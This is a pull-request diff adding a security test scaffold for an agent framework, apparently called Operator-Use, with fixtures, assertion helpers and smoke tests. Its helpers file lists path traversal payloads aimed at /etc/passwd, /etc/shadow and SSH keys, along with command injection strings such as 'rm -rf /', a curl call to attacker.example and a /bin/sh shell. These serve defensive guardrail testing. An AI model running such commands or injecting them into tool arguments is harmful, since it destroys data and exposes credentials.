Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions tests/security/__init__.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
"""Security test suite for Operator-Use.

Tests in this package verify that security guardrails are enforced
across tool invocations, file system access, and agent context handling.
"""
78 changes: 78 additions & 0 deletions tests/security/conftest.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,78 @@
"""Shared fixtures for the security test suite."""

import logging
from pathlib import Path
from typing import Generator

import pytest


@pytest.fixture
def tmp_workspace(tmp_path: Path) -> Generator[Path, None, None]:
"""Isolated temporary directory simulating an agent workspace.

Creates a directory tree that mirrors the structure an agent would
operate in: a workspace root with ``files/`` and ``logs/`` subdirs.
The fixture yields the workspace root and guarantees cleanup after
the test, even on failure.

Yields:
Path: The root of the isolated workspace.
"""
workspace = tmp_path / "workspace"
workspace.mkdir()
(workspace / "files").mkdir()
(workspace / "logs").mkdir()
yield workspace
# tmp_path cleanup is handled by pytest automatically


@pytest.fixture
def mock_agent_context(tmp_workspace: Path) -> dict:
"""Minimal agent context dictionary for tool testing.

Provides the smallest set of keys required by tools under test so
that individual security tests do not need to construct full agent
objects.

Args:
tmp_workspace: The isolated workspace fixture.

Returns:
dict: A context mapping with ``workspace``, ``agent_id``, and
``permissions`` keys.
"""
return {
"workspace": tmp_workspace,
"agent_id": "test-agent-001",
"permissions": {
"read": True,
"write": True,
"execute": False,
"network": False,
},
}


@pytest.fixture
def capture_logs(
caplog: pytest.LogCaptureFixture,
) -> Generator[pytest.LogCaptureFixture, None, None]:
"""Fixture to capture and inspect log output during a test.

Sets the root logger to DEBUG level for the duration of the test so
that security-related log lines emitted at any level are visible.

Yields:
pytest.LogCaptureFixture: The caplog object; use
``capture_logs.records`` or ``capture_logs.text`` to inspect
what was logged.

Example::

def test_blocked_action_is_logged(capture_logs):
trigger_blocked_action()
assert any("blocked" in r.message.lower() for r in capture_logs.records)
"""
with caplog.at_level(logging.DEBUG):
yield caplog
126 changes: 126 additions & 0 deletions tests/security/helpers.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,126 @@
"""Utilities shared across the security test suite.

Provides payload generators and common assertion helpers so individual
test modules do not need to duplicate attack-string lists or outcome
checks.
"""

from __future__ import annotations

from typing import Callable


# ---------------------------------------------------------------------------
# Payload generators
# ---------------------------------------------------------------------------


def path_traversal_payloads() -> list[str]:
"""Return a list of path traversal attack strings.

Each entry is a filename or path fragment that should be rejected by
any file-access guardrail. The list covers classic ``../`` sequences,
URL-encoded variants, and absolute-path injections.

Returns:
list[str]: Distinct traversal payload strings.
"""
return [
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"%2e%2e%2f%2e%2e%2fetc%2fpasswd",
"....//....//etc/passwd",
"/etc/shadow",
"~/.ssh/id_rsa",
"../../.env",
"../tests/secret.txt",
]


def command_injection_payloads() -> list[str]:
"""Return a list of command injection attack strings.

Each entry is a shell fragment that should be rejected when provided
as a parameter to any tool that constructs shell commands.

Returns:
list[str]: Distinct injection payload strings.
"""
return [
"; rm -rf /",
"| cat /etc/passwd",
"&& curl http://attacker.example/exfil",
"`whoami`",
"$(id)",
"'; DROP TABLE users; --",
"\n/bin/sh -i",
"${IFS}cat${IFS}/etc/passwd",
]


# ---------------------------------------------------------------------------
# Assertion helpers
# ---------------------------------------------------------------------------


def assert_blocked(result: object, *, check: Callable[[object], bool] | None = None) -> None:
"""Assert that a tool result represents a blocked / denied operation.

Checks the common ``success`` attribute used by ``ToolResult``.
Optionally runs an extra callable ``check`` for domain-specific
validation.

Args:
result: The return value from a tool invocation.
check: Optional extra predicate; raises ``AssertionError`` if it
returns ``False``.

Raises:
AssertionError: When the result indicates success or the optional
check fails.

Example::

result = await tool.ainvoke(path="../../../etc/passwd")
assert_blocked(result, check=lambda r: "traversal" in (r.error or "").lower())
"""
assert hasattr(result, "success"), (
f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}"
)
assert result.success is False, (
f"Expected operation to be blocked (success=False) but got success={result.success!r}"
)
if check is not None:
assert check(result), f"Extra check failed for blocked result: {result!r}"


def assert_allowed(result: object, *, check: Callable[[object], bool] | None = None) -> None:
"""Assert that a tool result represents a permitted / successful operation.

Checks the common ``success`` attribute used by ``ToolResult``.
Optionally runs an extra callable ``check`` for domain-specific
validation.

Args:
result: The return value from a tool invocation.
check: Optional extra predicate; raises ``AssertionError`` if it
returns ``False``.

Raises:
AssertionError: When the result indicates failure or the optional
check fails.

Example::

result = await tool.ainvoke(path="safe_file.txt")
assert_allowed(result, check=lambda r: r.output is not None)
"""
assert hasattr(result, "success"), (
f"Expected a ToolResult-like object with a 'success' attribute, got {type(result)}"
)
assert result.success is True, (
f"Expected operation to be allowed (success=True) but got success={result.success!r}, "
f"error={getattr(result, 'error', None)!r}"
)
if check is not None:
assert check(result), f"Extra check failed for allowed result: {result!r}"
142 changes: 142 additions & 0 deletions tests/security/test_scaffold.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,142 @@
"""Example security test that validates the scaffold itself.

Serves as the acceptance-criteria "at least one example security test
passes using the scaffold" required by issue #7. It also acts as
living documentation showing how Phase 1 security tests should be
structured.
"""

from pathlib import Path
from typing import NamedTuple

import pytest

from tests.security.helpers import (
assert_allowed,
assert_blocked,
command_injection_payloads,
path_traversal_payloads,
)


# ---------------------------------------------------------------------------
# Minimal stub that mimics the ToolResult interface
# ---------------------------------------------------------------------------


class _StubResult(NamedTuple):
success: bool
output: str | None = None
error: str | None = None


# ---------------------------------------------------------------------------
# Fixture smoke tests
# ---------------------------------------------------------------------------


def test_tmp_workspace_is_isolated_directory(tmp_workspace: Path) -> None:
"""tmp_workspace provides a fresh, writable directory per test."""
assert tmp_workspace.exists()
assert tmp_workspace.is_dir()
sentinel = tmp_workspace / "sentinel.txt"
sentinel.write_text("ok")
assert sentinel.read_text() == "ok"


def test_tmp_workspace_contains_expected_subdirs(tmp_workspace: Path) -> None:
"""tmp_workspace pre-creates files/ and logs/ subdirectories."""
assert (tmp_workspace / "files").is_dir()
assert (tmp_workspace / "logs").is_dir()


def test_mock_agent_context_keys(mock_agent_context: dict) -> None:
"""mock_agent_context contains required keys for tool testing."""
required_keys = {"workspace", "agent_id", "permissions"}
assert required_keys.issubset(mock_agent_context.keys())


def test_mock_agent_context_workspace_is_path(mock_agent_context: dict) -> None:
"""mock_agent_context workspace value is a Path pointing to tmp_workspace."""
assert isinstance(mock_agent_context["workspace"], Path)
assert mock_agent_context["workspace"].exists()


def test_capture_logs_captures_debug_messages(capture_logs) -> None:
"""capture_logs fixture intercepts log records at DEBUG level."""
import logging

logger = logging.getLogger("operator_use.security.test")
logger.debug("scaffold-debug-sentinel")
assert any("scaffold-debug-sentinel" in r.message for r in capture_logs.records)


# ---------------------------------------------------------------------------
# Helper function tests
# ---------------------------------------------------------------------------


def test_path_traversal_payloads_returns_nonempty_list() -> None:
"""path_traversal_payloads() returns at least one payload."""
payloads = path_traversal_payloads()
assert len(payloads) > 0
assert all(isinstance(p, str) for p in payloads)


def test_path_traversal_payloads_contain_dotdot() -> None:
"""path_traversal_payloads() includes classic ../ traversals."""
payloads = path_traversal_payloads()
assert any(".." in p for p in payloads)


def test_command_injection_payloads_returns_nonempty_list() -> None:
"""command_injection_payloads() returns at least one payload."""
payloads = command_injection_payloads()
assert len(payloads) > 0
assert all(isinstance(p, str) for p in payloads)


def test_command_injection_payloads_contain_shell_operators() -> None:
"""command_injection_payloads() includes common shell operator chars."""
payloads = command_injection_payloads()
shell_chars = set(";|&`$")
assert any(shell_chars & set(p) for p in payloads)


# ---------------------------------------------------------------------------
# assert_blocked / assert_allowed helper tests
# ---------------------------------------------------------------------------


def test_assert_blocked_passes_on_failure_result() -> None:
"""assert_blocked does not raise when result.success is False."""
assert_blocked(_StubResult(success=False, error="denied"))


def test_assert_blocked_raises_on_success_result() -> None:
"""assert_blocked raises AssertionError when result.success is True."""
with pytest.raises(AssertionError, match="blocked"):
assert_blocked(_StubResult(success=True, output="ok"))


def test_assert_blocked_raises_when_extra_check_fails() -> None:
"""assert_blocked raises when the optional check predicate returns False."""
with pytest.raises(AssertionError, match="Extra check failed"):
assert_blocked(_StubResult(success=False, error="denied"), check=lambda _: False)


def test_assert_allowed_passes_on_success_result() -> None:
"""assert_allowed does not raise when result.success is True."""
assert_allowed(_StubResult(success=True, output="ok"))


def test_assert_allowed_raises_on_failure_result() -> None:
"""assert_allowed raises AssertionError when result.success is False."""
with pytest.raises(AssertionError, match="allowed"):
assert_allowed(_StubResult(success=False, error="denied"))


def test_assert_allowed_raises_when_extra_check_fails() -> None:
"""assert_allowed raises when the optional check predicate returns False."""
with pytest.raises(AssertionError, match="Extra check failed"):
assert_allowed(_StubResult(success=True, output="ok"), check=lambda _: False)
2 changes: 1 addition & 1 deletion tests/test_agent.py
Original file line number Diff line number Diff line change
Expand Up @@ -186,7 +186,7 @@ async def test_agent_run_with_tool_call_then_text(tmp_path):

# Register a simple echo tool
from pydantic import BaseModel
from operator_use.tools.service import Tool
from operator_use.agent.tools.service import Tool

class EchoParams(BaseModel):
message: str
Expand Down
2 changes: 1 addition & 1 deletion tests/test_control_center.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
import pytest
from unittest.mock import AsyncMock, MagicMock, patch

from operator_use.agent.tools.builtin.control_center import (
from operator_use.tools.control_center import (
control_center,
_set_plugin_enabled,
_get_plugin_enabled,
Expand Down
2 changes: 1 addition & 1 deletion tests/test_local_agents.py
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

import pytest

from operator_use.agent.tools.builtin.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents
from operator_use.tools.local_agents import LOCAL_AGENT_DELEGATION_CHAIN, localagents
from operator_use.messages.service import AIMessage


Expand Down
2 changes: 1 addition & 1 deletion tests/test_plugins.py
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
from operator_use.agent.tools.registry import ToolRegistry
from operator_use.agent.hooks.service import Hooks
from operator_use.agent.hooks.events import HookEvent
from operator_use.tools.service import Tool
from operator_use.agent.tools.service import Tool
from pydantic import BaseModel


Expand Down
2 changes: 1 addition & 1 deletion tests/test_tool_registry.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@
from pydantic import BaseModel

from operator_use.agent.tools.registry import ToolRegistry
from operator_use.tools.service import Tool
from operator_use.agent.tools.service import Tool


# --- Helpers ---
Expand Down
Loading
Loading